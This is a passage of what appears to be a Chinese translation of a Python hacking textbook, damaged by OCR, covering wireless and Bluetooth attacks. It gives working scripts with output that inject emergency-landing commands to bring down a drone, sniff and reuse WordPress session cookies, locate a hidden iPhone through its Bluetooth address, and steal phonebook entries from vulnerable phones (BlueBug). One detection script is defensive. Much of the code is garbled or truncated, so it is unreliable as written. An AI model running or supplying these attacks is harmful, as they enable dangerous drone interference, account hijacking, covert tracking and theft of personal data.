dsap=1Pkt.dsap 
ssap=1Pkt.ssap 
ctrl=1Pkt.ctrl 
nPkt=LLC(dsap=dsap, ssap=ssap, ctrl=ctrl) 
return nPkt 


def dupIP(pkt): 
iPkt=pkt.getlayer (IP) 
version=iPkt.version 
tos=iPkt.tos 
ID=iPkt.id 
flags=iPkt.flags 
ttl=iPkt .ttl 
proto=iPkt.proto 
src=iPkt.src 
dst=iPkt.dst 
options=iPkt.options 
nPkt=IP(version=version, id=ID, tos=tos, flags=flags, ttl=ttl, prot¢ 
return nPkt 


def dupUDP(pkt): 
uPkt=pkt.getlayer (UDP) 
sport=uPkt.sport 
dport=uPkt.dport 
nPkt=UDP(sport=sport, dport=dport ) 
return nPkt 


E z: z 


接 下 来 我 们 将 添加 一 些 新 的 方法 到 我 们 E L ERE E 类 中 ， 
叫 injectcmd() ， 这 个 元 数 复制 当前 包 中 的 没 一 层 ， 然 后 添加 新 的 指令 到 UDP 
层 。 在 创建 新 的 数据 包 之 后 ， 它 通过 sendp() 函数 发 送 命令 。 





def injectCmd(self, cmd): 

radio = dup.dupRadio(self.curPkt ) 

dot11 = dup.dupDot11(self.curPkt) 

Snap = dup.dupSNAP(self.curPkt ) 

lic = dup.dupLLC(self.curPkt) 

ip = dup.dupIP(self.curPkt) 

udp = dup.dupUDP(self.curPkt ) 

raw = Raw(load=cmd) 

Inge EPE = radio / dot11 / llc / snap / ip / udp / raw 
sendp(injectPkt ) 


紧急 降落 是 控制 无 人 机 的 一 个 重要 的 指令 。 者 控制 无 人 机 停止 引擎 随时 掉 到 地 上 ， 
为 了 执行 这 个 命令 ， 我 们 将 使 用 当前 的 序列 号 并 跳 100。 接 下 来 ， 我 们 发 送 命 

令 AT*COMWDG=$SEQ\r ， 这 个 命令 重 置 通讯 的 序列 号 ， 无 人 机 将 忽略 先前 的 序 命 
令 ( 比 如 那些 被 合法 的 iPhone 发 布 的 命令 )。 最 后 ， 我 们 发 送 我 们 的 紧急 迫降 命 
令 AT*REF=$SEQ, 290717952\r 。 


EMER = "290717952" 
def emergencyland(self): 
spoofSeq = self.seq + 100 
watch = 'AT*COMWDG=%1i\r '%spoofSeq 
toCmd = 'AT*REF=%1,%S\r'% (SpoofSeq + 1, EMER) 
self .injectCmd(watch) 
self .injectCmd(toCmd ) 


最 终 的 攻击 ， 紧 急迫 降 无 人 机 


让 我 们 整合 我 们 的 代码 并 进行 最 后 的 攻击 。 首 先 ， 我 们 确保 保存 生成 我 们 的 数据 包 
脚本 并 导入 dup.py ， 接 下 来 ， 我 们 检查 我 们 的 主要 功能 ， 开 始 拦截 监听 流量 发 现 
无 人 机 ， 并 提示 我 们 发 送 紧急 迫降 指令 。 不 到 70 行 的 代码 ， 我 们 已 经 成 功 的 拦截 的 
KAM? SRI | 感觉 对 我 们 的 活动 有 点 内 疫 。 下 一 节 中 ， 我 们 将 着 重 讨论 如 何 识 
别 在 加 密 无 线 网 络 上 的 恶意 活动 。 


# coding=UTF-8 

import threading 

import dup 

from scapy.all import * 


conf.iface = 'mono' 
NAVPORT = 5556 

LAND = '290717696' 
EMER = '290717952' 
TAKEOFF = '290718208' 


class interceptThread( threading. Thread): 
def _ init (self): 
threading. Thread. init__(self) 
self.curPkt = None 
self.seq = 0 
self .foundUAV = False 
def run(self): 
sniff(prn=self.interceptPkt, filter='udp port 5556') 
def interceptPkt(self, pkt): 
if self.foundUAV == False: 
print('[*] UAV Found.') 
self .foundUAV = True 
self.curPkt = pkt 
raw = pkt.sprintf('%Raw.1load%' ) 
try: 


self.seq = int(raw.split(',')[0].split('=')[-1]) + 5 
except: 
self.seq = 0 
EMER = "290717952" 
def emergencyland(self): 
spoofSeq = self.seq + 100 
watch = 'AT*COMWDG=%i\r '%spoofSeq 
toCmd = 'AT*REF=%1,%S\r'% (SpoofSeq + 1, EMER) 
self .injectCmd(watch) 
self .injectCmd(toCmd) 


def injectCmd(self, cmd): 
radio = dup.dupRadio(self.curPkt) 
dot11 = dup.dupDot11(self.curPkt) 
snap = dup.dupSNAP(self.curPkt ) 
llc = dup.dupLLC(self.curPkt ) 
ip = dup.dupIP(self.curPkt) 
udp dup .dupUDP(self.curPkt) 
raw Raw(load=cmd ) 
injectPkt = radio / dot11 / llc / snap / ip / udp / raw 
sendp(injectPkt) 
def takeoff(self): 
spoofSeq = self.seq + 100 
watch = 'AT*COMWDG=%i\r '%spoofSeq 
toCmd = 'AT*REF=%i,%S\r'% (spoofSeq + 1, TAKEOFF) 
self .injectCmd(watch) 
self .injectCmd(toCmd) 


def main(): 
uavintercept = interceptThread() 
uavintercept.start() 
print('[*] Listening for UAV Traffic. Please WAIT...') 
while uavIntercept.foundUAV == False: 
pass 
while True: 
tmp = raw_input('[-] Press ENTER to Emergency Land UAV.') 
uavintercept.emergencyland() 
if _name == ' main_': 
main() 


ee 


检测 Firesheep 


2010 年 ，Eric Butler 开 发 了 一 个 改变 游戏 规则 的 工具 ，Firesheep。 这 个 工具 提供 了 
简单 的 两 个 按钮 接口 用 来 远程 禄 取 不 知情 用 户 的 Facebook，Google，Twitter 等 社 
交 网 站 上 的 账户 。Eric 的 Firesheep 工 具 为 了 得 到 站 点 的 HTTP Cookies 被 动 的 在 无 
线 网 卡 上 监听 。 如 果 一 个 用 户 连 接 到 不 安全 的 网 站 也 没有 使 用 任何 服务 器 控件 如 
HTTPS 来 保护 他 的 会 话 ， 那 么 攻击 者 能 使 用 Firesheep 拦 截 cookies 并 被 重用 。 


Eric 提 供 了 一 个 简单 的 界面 用 来 建立 处 理 特殊 的 具体 的 cookie 来 捕获 重用 。 注 意 ， 
下 面 的 对 WordPress 的 处 理 包含 三 个 函数 。 首 先 matchPacket() 通过 查看 正则 表 
达 式 wordpress_[0-9a-fA-F]{32} 来 确认 cookie， 如 果 函 数 匹 配 到 了 点 则 | 表达 

HK? MA poe ha a 抽取 WordPress 的 sessionID cookie， 最 
后 identifyUser() 郊 数 解析 登陆 到 WordPress 的 用 户 名 ， 黑 客 使 用 这 些 信息 来 
登陆 用 户 的 WordPress ° 


// Authors: 
// Eric Butler <eric@codebutler.com> 
register({ 
name: 'Wordpress', 
matchPacket: function (packet) { 
for (varcookieName in packet.cookies) { 
if (cookieName.matcho { 
return true; 


} 
ty 
processPacket: function () { 

this.siteUrl += 'wp-admin/'; 

for (varcookieName in this.firstPacket.cookies) { 

if (cookieName.match(/4wordpress_[0-9a-fA-F]{32}$/)) { 
this.sessionId = this.firstPacket.cookies[cookieName]; 
break; 


} 
ty 
identifyUser: function () { 
var resp = this.httpGet(this.siteUrl); 
this.userName resp.body.querySelectorAll('#user_info a')[0].text( 
this.siteName ‘Wordpress (' + this.firstPacket.host + ')'; 
} 
}); 


图 : 





© WordPress 4“) Session Cookie 


在 一 个 实际 的 数据 包 中 ， 这 些 cookie 看 起 来 像 下 面 那些 ， 这 里 的 受害 者 运行 Safari 
浏览 器 连接 WordPress 在 www.violentpython.org 。 注 意 ， 字 符 串 
以 wordpress_e3b 开始 包含 了 受害 者 的 sessionID cookie 和 用 户 名 。 


GET /wordpress/wp-admin/HTTP/1.1 

Host: www.violentpython.org 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) 
AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1.2 Safari/534.§ 
Accept: */* 

Referer: http://www.violentpython.org/wordpress/wp-admin/ 
Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

Cookie: wordpress_e3bd8b33fb645122b50046ecbfbeef97=victim%7C132380: 
%7C889eb4e57a3d68265f26b166020fF161b; wordpress_logged_in_e3bd8b33Ft 
122b50046ecbfbeef97=victim%7C1323803979%7C3255ef169aa649F7 71587 Fd1: 


4f57; 
wordpress_test_cookie=wP+Cookie+check 
Connection: keep-alive 


图 


在 下 图 中 ， 一 个 攻击 者 在 火狐 上 运行 Firesheep 工 具 ， 识 别 出 相同 的 字符 串 发 送 到 
未 加 密 的 无 线 网 络 上 。 然 后 他 用 抽取 的 凭证 登陆 到 www.violentpython.og 上 。 
注意 ，HTTP GET 请 求 和 我 们 原来 的 请 求 一 样 ， 有 同样 的 cookie， 但 是 源 自 不 同 的 
浏览 器 。 虽 然 他 不 是 描述 这 里 ， 但 是 值得 注意 的 是 请 求 来 自 不 同 的 IP 地 址 ， 攻 击 者 
不 能 和 受害 者 使 用 相同 的 机 器 。 





GET /wordpress/wp-admin/ HTTP/1.1 

Host: www.violentpython.org 

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7; en-US; 
rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24 

Accept: text/html, application/xhtml+xml, application/ 
xml; q=0.9,*/*;q=0.8 

Accept-Language: en-us,en;q=0.5 

Accept-Encoding: gzip,deflate 

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 
Keep-Alive: 115 

Connection: keep-alive 


Cookie: wordpress_e3bd8b33fb645122b50046ecbfbeef97=victim%7C132380: 
%7C889eb4e57a3d68265f26b166020f161b; wordpress_logged_in_e3bd8b33Ft 
122b50046ecbfbeef97=victim%7C1323803979%7C3255ef169aa649F771587Fd1: 


E SSS SSS Sear 





集结 羊 群 --- 捕 获 WordPress cookie = M 


让 我 们 编写 一 个 快速 的 ed i la et 包含 session cookie 的 HTTP 会 
话 。 因 为 这 种 攻击 发 生 在 未 加 密 的 会 话 ， 我 们 将 过 滤 通 过 TCP 的 80 端 口 的 HTTP 协 
议 。 当 我 们 看 到 正则 表达 式 匹 配 WordPress cookie， 我 们 可 以 打印 cookie 内 容 到 屏 
幕 上 ， 我 们 只 想 看 到 客户 的 流量 ， 我 们 不 想 打 印 任 何 来 自 客户 的 包含 字符 

# "set" 的 cookie 。 


import re 
from scapy.all import * 


def fireCatcher(pkt): 
raw = pkt.sprintf('%Raw.1load%' ) 
r = re.findall('wordpress_[0-9a-fA-F]{32}', raw) 
if r and 'Set' not in raw: 
print(pkt.getlayer(IP).src+ ">"+pkt.getlayer(IP).dst+" Cool 


conf.iface = "mono" 
sniff(filter="tcp port 80", prn=fireCatcher ) 








运行 这 个 脚本 ， 我 们 很 快 识别 一 些 潜在 的 受害 者 通过 未 加 密 的 无 线 网 络 连 接 用 标准 
的 HTTP 会 话 连 接 到 WordPress 上 。 当 我 打印 特定 的 会 话 cookie 到 屏幕 上 时 ， 我 么 

注意 到 攻击 者 192.168.1.4 重用 了 来 自 192.168.1.3 的 受害 者 的 sessionID 

cookie ° 


defender# python fireCatcher.py 
192.168.1.3>173.255.226.98 

Cookie:wordpress_ e3bd8b33fb645122b50046ecbfbeef97 
192.168.1.3>173.255.226.98 
Cookie:wordpress_e3bd8b33fb645122b50046ecbfbeef97 
192.168.1.4>173.255.226.98 


为 了 检测 攻击 者 使 用 Firesheep， 我 们 必须 看 看 是 否 一 个 攻击 者 在 不 同 的 IP 上 重用 
cookie 值 。 为 此 ， 我 们 必须 修改 我 们 先前 的 脚本 。 现 在 我 们 要 建立 一 个 Hash 表 通 
过 sessionID 索引 cookie。 如 果 我 们 看 到 一 个 WordPress 会 话 ， 我 们 可 以 将 值 插 
入 到 Hash 表 并 存储 IP 地 址 。 如 果 我 们 再 一 次 看 到 ， 我 们 可 以 比较 检验 它 的 值 是 否 和 
Hash 表 相 冲 突 。 当 我 们 检测 到 冲突 时 ， 我 们 现在 有 相同 的 cookie 关 联 了 两 个 相同 的 
iP 地址。 在 这 一 点 上 ， 我 们 可 以 检测 到 茶 人 试图 偷 取 WorPress 的 会 话 并 打印 在 屏幕 
ke 


# coding=UTF-8 
__author__ = ‘dj' 
import optparse 

from scapy.all import * 
import re 


cookieTable = {} 


def fireCatcher(pkt): 
raw = pkt.sprintf('%Raw.1load%' ) 
r = re.findall('wordpress_[0-9a-fA-F]{32}', raw) 
if r and 'Set' not in raw: 
if r[0] not in cookieTable.keys(): 
cookieTable[r[0]] = pkt.getlayer(IP).src 
print('[+] Detected and indexed cookie.') 
elif cookieTable[r[0]] != pkt.getlayer(IP).src: 
print('[*] Detected Conflict for ' + r[0]) 
print('Victim = ' + cookieTable[r[0]]) 
print('Attacker = ' + pkt.getlayer(IP).src) 


def main(): 
parser = optparse.OptionParser("usage %prog -i<interface>") 
parser.add_option('-i', dest='interface', type='string', help= 
(options, args) = parser.parse_args() 
if options.interface == None: 
print parser.usage 
exit(0) 
else: 
try: 
conf.iface = options.interface 
sniff(filter='tcp port 80', prn=fireCatcher ) 
except KeyboardInterrupt: 
exit(0) 


if name == ! main ': 


main() 
后 
运行 我 们 的 脚本 ， 我 们 可 以 确认 一 个 重用 来 自 受害 者 的 WordPress sessionID 


cookie 的 黑客 正在 尝试 盗 取 某 人 的 会 话 。 在 这 一 点 上 我 们 已 经 掌握 了 用 Python 嗅 探 
802.11 的 无 线 网 络 。 让 我 们 在 下 一 节 探 究 如 何 用 Python 攻击 蓝牙 设备 。 





defender# python fireCatcher.py 

[+] Detected and indexed cookie. 

[*] Detected Conflict for: 

wordpress_ e3bd8b33fb645122b50046ecbfbeef 97 
Victim = 192.168.1.3 

Attacker = 192.168.1.4 


用 蓝牙 和 Python 跟踪 潜入 


研究 生 的 研究 有 时 候 是 一 个 艰巨 的 任务 。 一 个 巨大 任务 的 研究 需要 团队 的 合作 ， 我 
发 现 知道 团队 人 员 的 位 置 非常 有 用 。 我 的 研究 生 的 研究 围绕 着 蓝牙 协议 ， 它 似乎 也 
是 保持 我 团队 成 员 位 置 的 很 好 的 方法 。 为 了 和 蓝牙 交互 ， 我 们 要 用 到 PyBluez 模 
块 。 这 个 模块 扩展 了 Bluez 库 提供 的 利用 蓝牙 资源 的 功能 。 注 意 ， 导 入 我 们 的 蓝 
牙 库 后 ， 我 们 可 以 简单 的 利用 函数 discover_devices() 来 返回 附近 发 现 的 蓝牙 

设备 的 MAC 地 址 数组 。 接 下 来 ， 我 们 可 以 换算 MAC 地 址 为 友好 的 字符 串 设 备 名 通 

过 lookup_name() 有 函数。 最 后 我 们 能 打印 这 些 收集 设备 。 


from bluetooth import * 
devList = discover_devices() 
for device in devList: 
name = str(lookup_name(device) ) 
print("[+] Found Bluetooth Device " + str(name) ) 
print("[+] MAC address: "+str(device) ) 


让 我 们 继续 探究 。 为 此 ， 我 们 我 们 将 这 段 代码 封装 为 函数 findDevs ， 并 打印 我 们 
发 现 的 新 设备 。 我 们 可 以 用 一 个 数组 alreadyFound 来 保存 已 经 发 现 的 设备 ， 对 
于 每 个 发 现 的 设备 我 们 将 检查 是 否 已 经 存在 与 数组 中 。 如 果 不 存 在 我 们 将 打印 设备 
名 和 地 址 并 添加 到 数组 中 ， 在 我 们 的 主要 的 代码 中 ， 我 们 可 以 创建 一 个 无 限 循 环 运 
行 findDevs() 然后 睡眠 5 稍 。 


import time 
from bluetooth import * 


alreadyFound = [] 


def findDevs(): 
foundDevs = discover_devices(lookup_names=True) 
for (addr, name) in foundDevs: 
if addr not in alreadyFound: 
print('[*] Found Bluetooth Device: ' + str(name)) 
print('[+] MAC address: ' + str(addr)) 
alreadyFound.append(addr ) 


while True: 
findDevs() 
time.sleep(5) 


现在 我 们 运行 我 们 的 脚本 看 看 是 否 能 发 现 附近 任何 的 蓝牙 设备 。 注 意 ， 我 们 发 现 了 
一 个 打印 机 和 一 个 iPhone。 打 印 输 出 显示 友好 的 名 称 并 跟着 MAC 地 址 。 


attacker# python btScan.py 


Scanning for Bluetooth Devices. 

Found Bluetooth Device: Photosmart 8000 series 
MAC address: 00:16:38:DE:AD:11 

Scanning for Bluetooth Devices. 

Scanning for Bluetooth Devices. 

Found Bluetooth Device: TJ iPhone 

MAC address: DO@:23:DB:DE:AD:02 


我 们 可 以 写 一 个 简单 的 函数 来 提醒 我 们 这 些 特定 的 设备 在 我 们 附近 。 请 注意 ， 我 们 


将 改变 


我 们 的 原始 函数 增加 参数 tgtName ， 搜 索 我 们 的 发 现 列 表 发 现 特定 设备 。 


import time 
from bluetooth import * 


alreadyFound = [] 


def findDevs(): 


foundDevs = discover_devices(lookup_names=True) 
for (addr, name) in foundDevs: 
if addr not in alreadyFound: 
print('[*] Found Bluetooth Device: ' + str(name)) 
print('[+] MAC address: ' + str(addr)) 
alreadyFound.append(addr ) 


while True: 


findDevs() 


time.sleep(5) 


在 这 一 点 


E? 我 们 有 一 个 改装 的 工具 提醒 我 们 ， 有 一 个 特定 的 设备 ， 比 如 说 


iPhone， 进 来 了 。 


attacker# python btFind.py 


el 
[*] 
[+] 
[+] 
[+] 


Scanning for Bluetooth Device: TJ iPhone 
Found Target Device TJ iPhone 

Time is: 2012-06-24 18:05:49.560055 
With MAC Address: D0:23:DB:DE:AD:02 
Time is: 2012-06-24 18:06:05.829156 


拦截 无 线 流量 找到 蓝牙 地 址 


然而 ， 这 只 是 解决 了 一 般 的 问题 ， 我 们 的 脚本 只 能 发 现 设 置 为 可 见 的 蓝牙 设备 。 一 
个 隐藏 的 蓝牙 设备 我 们 怎么 发 现 它 ?3 让 我 们 考虑 一 下 隐藏 模式 下 iPhone 蓝牙 设备 的 
欺骗 性 。 加 1 到 802.11 无 线 设备 的 MAC 地 址 来 确认 iPhone 的 蓝牙 设备 的 MAC 地 址 。 
作为 802.11 无 线 设 备 电台 的 服务 没有 在 第 二 层 控制 保护 MAC 地 址 ， 我 们 可 以 简单 的 
嗅 探 它 并 使 用 这 些 信 息 计 算 南 蓝牙 设备 的 MAC 地 址 。 


让 我 们 设置 我 们 的 无 线 设 备 MAC 地 址 嗅 探 器 。 注 意 我 们 过 滤 MAC 地 址 只 包含 MAC 
和 八 个 字 节 的 前 三 个 字 节 。 前 三 个 字 节 作为 组 织 唯一 标识 符 (OUN)， 标 识 特定 的 制造 

商 ， 你 可 以 在 http://standards.ieee.org/cgi-bin/ouisearch 网 站 进一步 探讨 OUI 数 据 
库 。 比 如 说 我 们 使 用 OUI do:23:db (iPhone 4S 的 OUI)， 如 果 你 搜索 OUI| 数 据 库 ， 
你 能 确认 该 设备 属于 iPhone 。 


D0-23-DB (hex) Apple, Inc. 
DO23DB (base 16) Apple, Inc. 
1 Infinite Loop 
Cupertino CA 95014 
UNITED STATES 


我 们 的 Python 脚本 监听 802.11 数 据 帧 匹配 iPhone 4S 的 MAC 地 址 的 前 三 个 字 节 。 如 
果 检 测 到 ， 它 将 打印 结果 在 屏幕 上 并 存储 802.11 的 MAC 地 址 。 


from scapy.all import * 


def wifiPrint(pkt): 
iPhone_OUI = 'd0:23:db' 
if pkt.haslayer(Doti1): 
wifiMAC = pkt.getlayer(Doti1).addr2 
if iPhone_OUI == wifiMAC[:8]: 
print('[*] Detected iPhone MAC: ' + wifiMAC) 
conf.iface = 'mono' 
sniff (prn=wifiPrint ) 


现在 我 们 已 经 确认 了 iPhone 的 802.11 无 线 设 备 的 MAC 地 址 ， 我 们 需要 构建 蓝牙 设备 
的 无 线 设 备 。 我 们 可 以 计算 蓝牙 MAC 地 址 通过 802.11 无 线 地 址 加 1。 


def retBtAddr(addr): 
btAddr=str(hex(int(addr.replace(':', ''), 16) + 1))[2:] 
btAddr=btAddr[0:2]+":"+btAddr[2:4]+":"+btAddr[4:6]+":" + btAddi 
return btAddr 


mi — 


有 了 MAC 地 址 ， 攻 击 者 就 可 以 执行 设备 名 查询 这 个 设备 是 否 真 实 的 存在 。 即 时 在 隐 
藏 模式 下 ， 蓝 牙 设备 任 然 对 名 字 查 询 有 了 响应。 如果 蓝 牙 设备 响应 ， 我 们 可 以 打印 设 
备 名 和 MAC 地 址 子 屏 幕 上 。 有 一 点 需要 注意 ，iPhone 设 备 采 用 的 省 电 模式 ， 在 蓝 政 
不 匹配 或 者 没 使 用 时 禁用 蓝牙 设备 。 然 而 ， 当 iPhone 配 上 和 耳机 或 者 车 载 免 提 时 在 隐 
藏 模式 下 还 是 会 响应 设备 名 查询 的 。 如 果 你 测试 时 ， 脚 本 似乎 不 能 正确 的 工作 时 ， 
试 着 把 你 的 iPhone 和 其 他 设备 连 在 一 





def checkBluetooth(btAddr ) : 
btName = lookup_name(btAddr ) 
if btName: 
print('[+] Detected Bluetooth Device: ' + btName) 
else: 
print('[-] Failed to Detect Bluetooth Device.') 


当 我 们 把 所 有 的 代码 放 在 一 起 时 ， 我 们 有 能 力 识 别 iPhone 设备 隐藏 的 蓝牙 。 


# coding=UTF-8 
from scapy.all import * 
from bluetooth import * 


def retBtAddr(addr): 
btAddr=str(hex(int(addr.replace(':', ''), 16) + 1))[2:] 
btAddr=btAddr[0:2]+":"+btAddr[2:4]+":"+btAddr[4:6]+":" + btAddi 
return btAddr 


def checkBluetooth(btAddr ) : 
btName = lookup_name(btAddr ) 
if btName: 
print('[+] Detected Bluetooth Device: ' + btName) 
else: 
print('[-] Failed to Detect Bluetooth Device. ') 


def wifiPrint(pkt): 
iPhone_OUI = 'd0:23:db' 
if pkt.haslayer(Doti1): 
wifiMAC = pkt.getlayer(Doti1).addr2 
if iPhone_OUI == wifiMAC[:8]: 
print('[*] Detected iPhone MAC: ' + wifiMAC) 
btAddr = retBtAddr (wifiMAC ) 
print('[+] Testing Bluetooth MAC: ' + btAddr) 
checkBluetooth(btAddr ) 


conf.iface = 'mono' 
sniff (prn=wifiPrint ) 





5 Hee fT aA me AM » BUTT AS» IRA T — “iPhone 802.11 Ait 
的 MAC 地 址 。 和 它 的 无 线 设 备 。 在 下 一 节 中 ， 我 们 将 挖掘 更 深 的 设备 信息 ， 通 过 扫 
描 各 种 有 关 蓝 牙 的 协议 和 端口 。 


attacker# python find-my-iphone.py 

[*] Detected iPhone MAC: d0:23:db:de:ad:01 
[+] Testing Bluetooth MAC: d0:23:db:de:ad:02 
[+] Detected Bluetooth Device: TJ’s iPhone 


扫描 蓝牙 的 RFCOMM 信 道 


2004 年 ，Herfurt 和 Laurie 展 示 了 一 个 蓝牙 漏洞 ， 他 们 成 为 BlueBug。 这 个 漏洞 针对 
蓝牙 的 RFCOMM 传 输 协 议 。RFCOMM 通 过 蓝牙 的 L2CAP 协 议 模拟 RS232 串 口 通 
讯 。 本 质 上 ， 这 将 创建 一 个 蓝牙 连接 到 一 个 设备 ， 模 拟 一 个 简单 的 串 行 电缆 ， 允 许 
用 户 发 起 电话 呼叫 ， 发 送 短信 ， 阅 读 通讯 录 列 表 转 接 电话 或 者 通过 蓝牙 连接 到 互联 
网 。RFCOMM 提 供 验 证 和 加 密 连 接 的 能 力 。 制 造 商 偶尔 忽略 此 功能 允许 未 经 认证 
连接 到 此 设备 。Herfurt 和 Laurie 编 写 了 一 个 工具 能 连接 到 未 认证 的 设备 信道 发 送 命 
令 控 制 或 者 下 载 设 备 上 的 内 容 。 在 这 节 中 ， 我 们 将 编写 一 个 扫 瞄 器 确认 未 认证 的 的 
RFCOMM 信 道 。 


看 看 下 面 的 代码 ，RFCOMM 连 接 和 标准 的 TCP 套 接 字 连 接 非 常 的 相似 。 为 了 连接 
到 一 个 RFCOMM 端 口 ， 我 们 将 生成 一 个 RFCOMM 类 型 的 蓝牙 套 接 字 。 接 下 来 我 们 
通过 connect() 函数 ， 包 含 目 标 设备 的 MAC 地 址 和 端口 的 一 个 元 组 。 如 果 我 们 成 
功 了 ， 我 们 会 知道 RFRCOMM 信 道 开 放 并 正在 监听 。 如 果 函 数 抛 出 异常 ， 我 们 知道 
我 们 不 能 连接 到 这 个 端口 ， 我 们 将 重复 尝试 30 个 可 能 的 RFCOMM 端 口 进 行 连接 。 


from bluetooth import * 


def rfcommCon(addr, port): 

sock = BluetoothSocket (RFCOMM) 

try: 
sock.connect((addr, port)) 
print('[+] RFCOMM Port ' + str(port) + ' open') 
sock.close() 

except Exception as e: 
print('[-] RFCOMM Port ' + str(port) + ' closed') 


for port in range(1, 30): 
rfcommCon('00:16:38:DE:AD:11', port) 


当 我 们 运行 我 们 的 脚本 针对 附近 的 打印 机 ， 我 们 看 到 开放 了 五 个 RFCOMM 端 口 。 
然而 ， 我 们 没有 瘟 正 了 解 这 些 端口 提供 了 的 什么 服务 。 为 了 了 解 更 多 关于 这 些 服 
务 ， 我 们 需要 使 用 蓝牙 服务 发 现 功能 。 


attacker# python rfcommScan. py 
[+] RFCOMM Port 1 open 
[+] RFCOMM Port 2 open 
[+] RFCOMM Port 3 open 
[+] RFCOMM Port 4 open 
[+] RFCOMM Port 5 open 
[-] RFCOMM Port 6 closed 
[-] RFCOMM Port 7 closed 
<,.SNIPPED...> 


使 用 蓝牙 服务 发 现 协议 


蓝牙 服务 发 现 协议 (SDP) 提 供 了 一 种 简单 的 方法 来 来 描述 和 枚 举 设备 提供 的 蓝牙 功 
能 和 服务 。 浏 览 SDP 文 件 描 述 了 服务 在 每 一 个 独一无二 的 蓝牙 协议 和 端口 上 运行 。 
使 用 函数 find_service() 返回 了 一 个 记录 数组 ， 这 些 记 录 包 含 主机 ， 名 称 ， 描 
述 ， 供 应 商 ， 协 议 ， 端 口 ， 服 务 类 ， 介 绍 和 每 个 目标 蓝牙 每 一 个 可 用 服务 的 ID， 就 
我 们 的 目的 而 言 ， 我 们 的 脚本 只 打印 服务 名 称 ， 协 议和 端口 号 。 


from bluetooth import * 


def sdpBrowse(addr): 
services = find_service(address=addr ) 
for service in services: 
name = service['name' ] 
proto = service['protocol' ] 
port = str(service['port']) 
print('[+] Found ' + str(name)+' on '+ str(proto) + ':'+por 


sdpBrowse('00:16:38:DE:AD:11') 
4 = I 





当 我 们 运行 我 们 的 脚本 针对 我 们 的 打印 机 蓝牙 ， 我 们 看 到 RFCOMM 端 口 2 提供 
OBEX 对 象 推 送 功能 。 对 象 交 换 服 务 (OBEX) 让 我 们 有 类 似 与 FTP 匿 名 登陆 的 的 能 
力 ， 我 们 可 以 匿名 的 上 传 和 下 载 文 件 从 系统 里 面 ， 这 可 能 是 打印 机 上 值得 进一步 研 
究 的 东西 。 


attacker# python sdpScan.py 

[+] Found Serial Port on RFCOMM:1 

[+] Found OBEX Object Push on RFCOMM:2 

[+] Found Basic Imaging on RFCOMM:3 

[+] Found Basic Printing on RFCOMM:4 

[+] Found Hardcopy Cable Replacement on L2CAP:8193 


用 Python ObexFTP 接 管 打 印 机 


让 我 们 继续 对 打印 机 进行 攻击 。 因 为 它 在 RFCOMM 的 端口 2 上 提供 了 OBEX 服 务 ， 
让 我 们 尝试 推送 一 个 照片 上 去 。 我 们 使 用 obexftp 连接 打印 机 ， 接 着 我 们 从 攻击 
者 的 主机 上 发 送 一 个 图 片 给 它 。 当 文件 传输 成 功 ， 我 们 的 打印 机 开始 为 我 们 打印 图 
像 。 这 太 令 人 兴奋 了 ! 但 不 一 定 是 危险 的 ， 所 以 我 们 将 继续 在 下 一 节 中 使 用 这 种 方 
法 对 提供 蓝牙 的 手机 实施 更 致命 的 攻击 。 


import obexftp 

try: 
btPrinter = obexftp.client(obexftp.BLUETOOTH) 
btPrinter.connect('00:16:38:DE:AD:11', 2) 
btPrinter.put_file('/tmp/ninja.jpg') 
print('[+] Printed Ninja Image.') 

except: 

print('[-] Failed to print Ninja Image.') 


用 Python BlueBug 手 机 


在 本 节 中 ， 我 们 将 重 现 一 个 最 近 的 手机 蓝牙 攻击 向 量 。 

该 攻击 使 用 未 认证 的 和 不 安全 的 连接 手机 偷 取 手机 的 详细 信息 或 者 直接 向 手机 发 送 
指令 。 这 个 攻击 使 用 RFCOMM 信 道 发 送 AT 命 令 作 为 远程 控 制 设备 的 工具 。 者 允许 
攻击 者 读 写 短信 ， 收 集 个 人 信息 或 者 拨打 号 码 。 


例如 ， 攻 击 者 可 以 控制 一 个 诺基亚 6310i 通 过 RFCOMM 的 17 信 道 。 在 以 前 前 这 这 这 手机 
的 固件 版 本 ，RFCOMM 信 道 17 不 需要 身份 验证 便 可 连接 ， 攻 击 者 可 以 简单 的 扫描 
RFCOMM 打 开 的 信道 发 现 17 信 道 ， 连接 并 且 发 送 AT 命 令 下 载 电 话 号 。 让 我 们 用 
Python 来 重 现 这 次 攻击 。 再 一 次 ， 我 们 需要 导入 Python 的 Bluez API 模 块 。 确 认 
我 们 的 目标 地 址 和 脆弱 的 RFCOMM 端 口 之 后 ， 我 们 创建 一 个 到 开放 ， 未 经 验证 ， 
未 加 密 的 连接 。 使 用 这 个 新 创建 的 连接 ， 我 们 发 送 一 个 命令 

如 "AT+CPBR=1" 来 下 载 通讯 录 的 第 一 个 号 码 ， 重 复 次 命令 偷 取 全 部 的 通讯 录 。 


import bluetooth 


tgtPhone = 'AA:BB:CC:DD:EE:FF' 
port = 17 
phoneSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) 
phoneSock.connect((tgtPhone, port)) 
for contact in range(1, 5): 
atCmd = 'AT+CPBR=' + str(contact) + '\n' 
phoneSock.send(atCmd ) 
result = phoneSock.recv(1024) 
print '[+] ' + str(contact) + ': ' + result 
phoneSock.close() 


针对 脆弱 的 手机 运行 我 们 的 脚本 ， = S 系 人 的 电话 
号 码 。 不 到 五 十 行 的 代码 ， 我 们 可 以 通过 蓝牙 远程 田 取 通讯 录 电 话 号 码 。 棒 极 了 ! 


attacker# python bluebug.py 
[+] 1: +CPBR: 1,.°555-1234", ," Joe Senz" 


[+] 2: +CPBR: 2,"555-9999",,"Jason Brown" 

[+] 3: +CPBR: 3, "555-7337", , "Glen Godwin" 

[+] 4: +CPBR: 4,"555-1111",,"Semion Mogilevich" 
[+] 5: +CPBR: 5,"555-8080",, "Robert Fisher 


J 


本 章 总 结 


恭喜 你 ! 在 这 一 章 我 们 已 经 编写 了 很 多 工具 ， 我 们 可 以 用 它们 来 设计 无 线 网 络 和 蓝 
牙 设 备 。 我 们 从 通过 无 线 网 络 截获 私人 信息 开始 。 接 下 来 ， 我 们 研究 如 何 分 析 
802.11 无 线 流量 ， 为 了 发 现 首选 网 络 和 隐藏 的 接 入 点 。 然 后 ， 我 们 紧急 迫降 了 一 个 
